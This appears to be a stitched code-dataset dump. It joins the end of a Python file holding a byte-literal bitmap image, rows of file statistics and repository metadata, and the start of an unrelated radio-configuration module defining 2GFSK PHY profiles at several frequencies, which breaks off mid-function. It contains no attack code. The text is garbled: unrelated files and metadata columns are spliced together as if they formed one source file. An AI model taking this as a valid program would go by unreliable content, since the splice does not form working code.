b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\xbb\x00\x00\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\xbb\x00\x00\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\xbb\x00\x00\x00'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\xbb\x00\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\xbb\x00\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x00\x77\x77\x00'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x00\x77\x77\x00'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x00\x77\x00\x77\x77\x77\x00\x77\x00\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x00\x77\x00\x77\x77\x77\x00\x77\x00\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x00\x00\x00\x00\x00\x00\x00\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x00\x00\x00\x00\x00\x00\x00\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55'\
b'\x55\x55\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55'\
b'\x55\x55\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44'\
b'\x44\x44\x44\x55\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44'\
b'\x44\x44\x44\x55\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44'\
b'\x44\x44\x44\x22\x44\x55\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44'\
b'\x44\x44\x44\x22\x44\x55\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44\x44\x22'\
b'\x44\x44\x44\x44\x44\x44\x44\x55\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44\x44\x22'\
b'\x44\x44\x44\x44\x44\x44\x44\x55\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44\x22\x44\x44\x44'\
b'\x44\x44\x44\x44\x22\x44\x44\x44\x55\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44\x22\x44\x44\x44'\
b'\x44\x44\x44\x44\x22\x44\x44\x44\x55\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44\x44\x22\x44\x44\x44\x44'\
b'\x44\x44\x22\x44\x44\x44\x44\x44\x44\x55\x55\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x55\x55\x44\x44\x44\x44\x44\x22\x44\x44\x44\x44'\
b'\x44\x44\x22\x44\x44\x44\x44\x44\x44\x55\x55\x00\x00\x00\x00\x00'\
b'\x00\x00\x55\x55\x44\x44\x44\x44\x44\x44\x22\x22\x44\x44\x44\x22'\
b'\x44\x33\x44\x22\x33\x44\x44\x44\x44\x44\x44\x55\x00\x00\x00\x00'\
b'\x00\x00\x55\x55\x44\x44\x44\x44\x44\x44\x22\x22\x44\x44\x44\x22'\
b'\x44\x33\x44\x22\x33\x44\x44\x44\x44\x44\x44\x55\x00\x00\x00\x00'\
b'\x00\x55\x44\x44\x44\x44\x44\x44\x44\x44\x33\x44\x33\x44\x33\x22'\
b'\x44\x44\x44\x44\x22\x44\x44\x44\x44\x44\x44\x44\x55\x00\x00\x00'\
b'\x00\x55\x44\x44\x44\x44\x44\x44\x44\x44\x33\x44\x33\x44\x33\x22'\
b'\x44\x44\x44\x44\x22\x44\x44\x44\x44\x44\x44\x44\x55\x00\x00\x00'\
b'\x22\x55\x44\x22\x44\x44\x22\x44\x44\x44\x44\x44\x44\x22\x44\x33'\
b'\x44\x22\x44\x44\x44\x22\x44\x44\x44\x44\x44\x44\x44\x55\x00\x00'\
b'\x22\x55\x44\x22\x44\x44\x22\x44\x44\x44\x44\x44\x44\x22\x44\x33'\
b'\x44\x22\x44\x44\x44\x22\x44\x44\x44\x44\x44\x44\x44\x55\x00\x00'\
b'\x22\x22\x55\x44\x44\x44\x44\x44\x44\x22\x44\x44\x44\x44\x44\x22'\
b'\x44\x22\x44\x44\x44\x22\x44\x44\x44\x44\x44\x44\x44\x44\x55\x00'\
b'\x22\x22\x55\x44\x44\x44\x44\x44\x44\x22\x44\x44\x44\x44\x44\x22'\
b'\x44\x22\x44\x44\x44\x22\x44\x44\x44\x44\x44\x44\x44\x44\x55\x00'\
b'\x22\x22\x22\x55\x55\x44\x44\x44\x22\x44\x22\x44\x44\x44\x44\x22'\
b'\x22\x44\x44\x44\x44\x22\x22\x44\x44\x44\x44\x44\x44\x44\x55\x55'\
b'\x22\x22\x22\x55\x55\x44\x44\x44\x22\x44\x22\x44\x44\x44\x44\x22'\
b'\x22\x44\x44\x44\x44\x22\x22\x44\x44\x44\x44\x44\x44\x44\x55\x55'\
b'\x22\x22\x22\x22\x22\x55\x22\x44\x44\x44\x44\x44\x44\x44\x33\x44'\
b'\x22\x22\x44\x33\x44\x44\x44\x44\x44\x22\x44\x44\x55\x55\x22\x22'\
b'\x22\x22\x22\x22\x22\x55\x22\x44\x44\x44\x44\x44\x44\x44\x33\x44'\
b'\x22\x22\x44\x33\x44\x44\x44\x44\x44\x22\x44\x44\x55\x55\x22\x22'\
b'\x00\x22\x22\x22\x22\x22\x22\x55\x55\x44\x44\x44\x44\x44\x44\x44'\
b'\x44\x22\x44\x44\x44\x44\x44\x44\x44\x44\x44\x55\x22\x22\x22\x22'\
b'\x00\x22\x22\x22\x22\x22\x22\x55\x55\x44\x44\x44\x44\x44\x44\x44'\
b'\x44\x22\x44\x44\x44\x44\x44\x44\x44\x44\x44\x55\x22\x22\x22\x22'\
b'\x00\x00\x22\x22\x22\x22\x22\x22\x22\x55\x55\x44\x44\x44\x44\x44'\
b'\x44\x44\x44\x44\x44\x44\x44\x44\x55\x55\x55\x22\x22\x22\x22\x22'\
b'\x00\x00\x22\x22\x22\x22\x22\x22\x22\x55\x55\x44\x44\x44\x44\x44'\
b'\x44\x44\x44\x44\x44\x44\x44\x44\x55\x55\x55\x22\x22\x22\x22\x22'\
b'\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22\x22\x55\x55\x44\x22\x44'\
b'\x44\x44\x44\x44\x44\x22\x55\x55\x22\x22\x22\x22\x22\x22\x22\x22'\
b'\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22\x22\x55\x55\x44\x22\x44'\
b'\x44\x44\x44\x44\x44\x22\x55\x55\x22\x22\x22\x22\x22\x22\x22\x22'\
b'\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22\x22\x55\x44\x44'\
b'\x44\x44\x44\x55\x55\x55\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00'\
b'\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22\x22\x55\x44\x44'\
b'\x44\x44\x44\x55\x55\x55\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22\x55\x55'\
b'\x55\x55\x55\x22\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22\x55\x55'\
b'\x55\x55\x55\x22\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22'\
b'\x22\x22\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x22\x22'\
b'\x22\x22\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
BITMAP = memoryview(_bitmap)
| 68.293846
| 123
| 0.710437
| 10,913
| 44,391
| 2.889673
| 0.003757
| 0.686475
| 0.844776
| 0.915554
| 0.994451
| 0.994451
| 0.994451
| 0.994451
| 0.994451
| 0.994451
| 0
| 0.397644
| 0.015003
| 44,391
| 649
| 124
| 68.399076
| 0.323568
| 0
| 0
| 0.984592
| 0
| 0.986133
| 0.92271
| 0.92271
| 0
| 1
| 0.002163
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 16
|
7a41d220565ff9eba980c83bbccb7c07e27c3498
| 29,906
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/jumbo/phys/Phys_connect.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/jumbo/phys/Phys_connect.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 6
|
2022-01-12T18:22:08.000Z
|
2022-03-25T10:19:27.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/jumbo/phys/Phys_connect.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from pyradioconfig.calculator_model_framework.Utils.LogMgr import LogMgr
from pyradioconfig.calculator_model_framework.interfaces.iphy import IPhy
from py_2_and_3_compatibility import *
class PHYS_connect(IPhy):
def Connect_base(self, phy, model):
phy.profile_inputs.baudrate_tol_ppm.value = 0
phy.profile_inputs.dsss_chipping_code.value = long(0)
phy.profile_inputs.dsss_len.value = 0
phy.profile_inputs.dsss_spreading_factor.value = 0
phy.profile_inputs.fsk_symbol_map.value = model.vars.fsk_symbol_map.var_enum.MAP0
phy.profile_inputs.modulation_type.value = model.vars.modulation_type.var_enum.FSK2
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
phy.profile_inputs.shaping_filter_param.value = 0.5
phy.profile_inputs.symbol_encoding.value = model.vars.symbol_encoding.var_enum.NRZ
phy.profile_inputs.xtal_frequency_hz.value = 38400000
phy.profile_inputs.diff_encoding_mode.value = model.vars.diff_encoding_mode.var_enum.DISABLED
phy.profile_inputs.crc_byte_endian.value = model.vars.crc_byte_endian.var_enum.MSB_FIRST
phy.profile_inputs.crc_bit_endian.value = model.vars.crc_bit_endian.var_enum.MSB_FIRST
phy.profile_inputs.preamble_pattern_len.value = 2
phy.profile_inputs.preamble_length.value = 32
phy.profile_inputs.preamble_pattern.value = 1
phy.profile_inputs.syncword_0.value = long(11732)
phy.profile_inputs.syncword_1.value = long(0)
phy.profile_inputs.syncword_length.value = 16
phy.profile_inputs.white_poly.value = model.vars.white_poly.var_enum.PN9
def PHY_Connect_915MHz_2GFSK_500kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='US FCC 915, Brazil 915', readable_name="Connect 915MHz 2GFSK 500kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.rx_xtal_error_ppm.value = 0
phy.profile_inputs.tx_xtal_error_ppm.value = 0
phy.profile_inputs.deviation.value = 175000
phy.profile_inputs.base_frequency_hz.value = 915000000
phy.profile_inputs.bitrate.value = 500000
phy.profile_inputs.preamble_length.value = 40
phy.profile_inputs.syncword_tx_skip.value = False
phy.profile_inputs.asynchronous_rx_enable.value = False
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
phy.profile_inputs.channel_spacing_hz.value = 400000
phy.profile_inputs.test_ber.value = False
phy.profile_inputs.fec_en.value = model.vars.fec_en.var_enum.NONE
phy.profile_inputs.manchester_mapping.value = model.vars.manchester_mapping.var_enum.Default
return phy
def PHY_Connect_902MHz_2GFSK_200kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='US FCC 902, Brazil 902', readable_name="Connect 902MHz 2GFSK 200kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.base_frequency_hz.value = long(902000000)
phy.profile_inputs.bitrate.value = 200000
phy.profile_inputs.deviation.value = 50000
phy.profile_inputs.channel_spacing_hz.value = 400000
phy.profile_inputs.rx_xtal_error_ppm.value = 20
phy.profile_inputs.symbols_in_timing_window.value = 14
phy.profile_inputs.tx_xtal_error_ppm.value = 20
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
return phy
def PHY_Connect_434MHz_2GFSK_200kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='US FCC 434', readable_name="Connect 434MHz 2GFSK 200kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.bandwidth_hz.value = 400000
phy.profile_inputs.base_frequency_hz.value = long(434000000)
phy.profile_inputs.bitrate.value = 200000
phy.profile_inputs.deviation.value = 100000
phy.profile_inputs.channel_spacing_hz.value = 500000
phy.profile_inputs.rx_xtal_error_ppm.value = 20
phy.profile_inputs.symbols_in_timing_window.value = 14
phy.profile_inputs.tx_xtal_error_ppm.value = 20
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
return phy
def PHY_Connect_863MHz_2GFSK_100kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='Europe 868', readable_name="Connect 863MHz 2GFSK 100kbps", phy_name=phy_name)
self.Connect_base(phy, model)
